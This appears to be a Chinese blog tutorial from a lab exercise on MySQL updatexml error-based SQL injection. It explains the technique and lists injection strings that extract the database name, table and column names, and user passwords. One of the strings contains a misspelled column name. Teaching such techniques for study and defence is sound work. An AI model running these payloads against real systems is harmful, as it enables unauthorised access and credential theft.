当前位置: 首页 > news >正文

iwebsec-updatexml报错注入

news 来源:原创 2025/5/9 21:45:02

原理分析

Updatexml()函数“updatexml(XML_document, XPath_string, new_value);”

参数描述
XML_documentString格式,为XML文档对象的名称,文中为Doc
XPath_stringXpath格式的字符串
new_valueString格式,替换查找到的符合条件的数据

即sql语句为“select updatexml(1,concat(0x7e,(SELECT user()),0x7e),1”
concat()函数是将其连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误,爆出用户
0x7eASCII码,实为~,upadtexml()报错信息为特殊字符、字母及之后的内容,为了前面字母丢失,开头连接一个特殊字符~

实战注入

1.判断是否存在漏洞,添加and 1=1# 页面正常回显,and 1=2# 页面回显异常,即存在sql注入漏洞

2.爆出数据库

id=1 and (updatexml(1,concat('~',(select database())),3))#

3.爆出表

id=1 and (updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schame=database())),3))#

4.爆出users表字段

id=1 and (updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),3))#

5.爆数据

id=1 and (updatexml(1,concat('~',(select group_concat(username,',',password) from users)),3))#

 

相关文章:

  • Linux的I2C总线的原理和结构详解
  • ZMC600E,多核异构如何成就机器人精准控制?
  • CMS漏洞-DeDeCMS篇
  • Python数据可视化实战:从基础图表到高级分析
  • 基于springboot的房产销售系统(016)
  • Spring常用参数校验注解
  • 【MySQL】存储过程
  • 前端安全之DOMPurify基础使用
  • 如何理解分布式光纤传感器?
  • 二手Mac验机过程
  • 新一代电子数据取证专家 | 苏州龙信信息科技有限公司
  • 操作系统为ubantu的服务器上部署nginx软件基础步骤总结
  • 25.单例模式实现线程池
  • Ubuntu基础学习----指令
  • Qt 多线程设计:死循环与信号槽的权衡
  • 通过Knife4j在gateway中对swagger文档进行聚合
  • C# MVC项目部署II后错误,403禁止访问:访问被拒绝问题处理
  • pycharm常用快捷键
  • 2025-03-19 Unity 网络基础2——网络通信基础
  • vmware下linux无法上网解决方法
  • 上海“世行对标改革”的税务样本:设立全国首个税务审判庭、制定首个税务行政复议简易程序
  • 本周看啥|喜欢二次元的观众,去电影院吧
  • 教育部答澎湃:2025世界数字教育大会将发布系列重磅成果
  • 上海杨浦:优秀“博主”购房最高可获200万补贴
  • 海南省三亚市委原常委、秘书长黄兴武被“双开”
  • 个人住房公积金贷款利率下调,100万元30年期贷款总利息将减少近5万元